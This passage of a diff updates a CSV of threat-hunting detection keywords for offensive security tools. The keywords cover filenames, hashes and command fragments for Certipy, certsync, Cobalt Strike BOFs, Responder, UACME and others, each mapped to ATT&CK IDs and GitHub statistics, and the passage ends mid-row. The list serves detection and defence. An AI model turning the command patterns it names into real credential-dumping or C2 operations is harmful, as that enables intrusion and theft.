-"*ccache2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*ccache2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ccac7cdcbd419f3184c3886f5c36669ff9f7714b57a1249e2bb4be07b492c8ac*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*ccache2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ccache2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*CCHOST=127.0.0.1*/tmp/c2*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*cckuailong/reapoc*","offensive_tool_keyword","reapoc","OpenSource Poc && Vulnerable-Target Storage Box.","T1552","TA0006","N/A","N/A","Exploitation tools","https://github.com/cckuailong/reapoc","1","1","N/A","N/A","7","629","219","2023-02-06T08:27:09Z","2021-11-28T00:46:27Z" "*CCob/BOF.NET*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" -"*CCob/ThreadlessInject*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","6","552","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" +"*CCob/ThreadlessInject*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","6","553","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" "*cd ./whereami/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","0","N/A","10","10","152","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" -"*cd ffuf*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*cd ffuf*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" "*cd golang_c2*","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" -"*cd inceptor*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*cd inceptor*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*cd katoolin3*","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/s-h-3-l-l/katoolin3","1","0","N/A","N/A","4","315","103","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" "*cd koadic*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*cd ligolo*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" @@ -8332,54 +8479,55 @@ "*Cdn-Proxy-Origin*","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","213","25","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" "*cdn-scanner -*","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","213","25","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" "*CE895D82-85AA-41D9-935A-9625312D87D0*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" -"*cef0c644e3203b086519fbb77ccc50589b59d5b9a44adfb72a7f2bc6924e9878*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*cef0c644e3203b086519fbb77ccc50589b59d5b9a44adfb72a7f2bc6924e9878*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*celerystalk*","offensive_tool_keyword","celerystalk","celerystalk helps you automate your network scanning/enumeration process with asynchronous jobs (aka tasks) while retaining full control of which tools you want to run.","T1046 - T1057 - T1082 - T1087 - T1069","TA0001 - TA0007","N/A","N/A","Information Gathering","https://github.com/sethsec/celerystalk","1","0","N/A","N/A","4","389","75","2021-03-24T01:23:11Z","2018-08-13T04:21:37Z" -"*cerbrutus.py*","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","3","290","42","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" -"*Cerbrutus-BruteForcer*","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","3","290","42","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" -"*cert*responder.crt*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" -"*cert*responder.key*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" -"*certi.py_vulntemplates_output*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*certi_py_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*Certify.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*certipy account *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" -"*certipy auth *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" -"*certipy ca *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" -"*certipy ca -backup*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" -"*certipy cert *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" -"*certipy find *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*cerbrutus.py*","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","3","291","42","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" +"*Cerbrutus-BruteForcer*","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","3","291","42","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" +"*cert*responder.crt*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*cert*responder.key*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*certi.py_vulntemplates_output*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*certi_py_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*Certify.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*certipy account *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy auth *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy ca *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy ca -backup*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy cert *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy find *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" "*certipy find *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*certipy forge *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" -"*certipy forge *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" -"*certipy relay *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy forge *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy forge *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy relay *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" "*certipy relay -ca *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*certipy req *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy req *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" "*certipy req -username *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*certipy shadow *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" -"*certipy template *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" -"*certipy_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*certipy-master.zip*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy shadow *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy template *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*certipy-master.zip*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" "*CertStealer.csproj*","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","5","450","67","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z" "*CertStealer.exe*","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","5","450","67","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z" "*CertStealer.sln*","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","5","450","67","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z" -"*certsync *--dc-ip*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","566","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" -"*certsync -u *","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","566","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" +"*certsync *--dc-ip*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" +"*certsync -u *","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" "*certsync -u * -p *-d * -ca-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*certsync_ntds_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 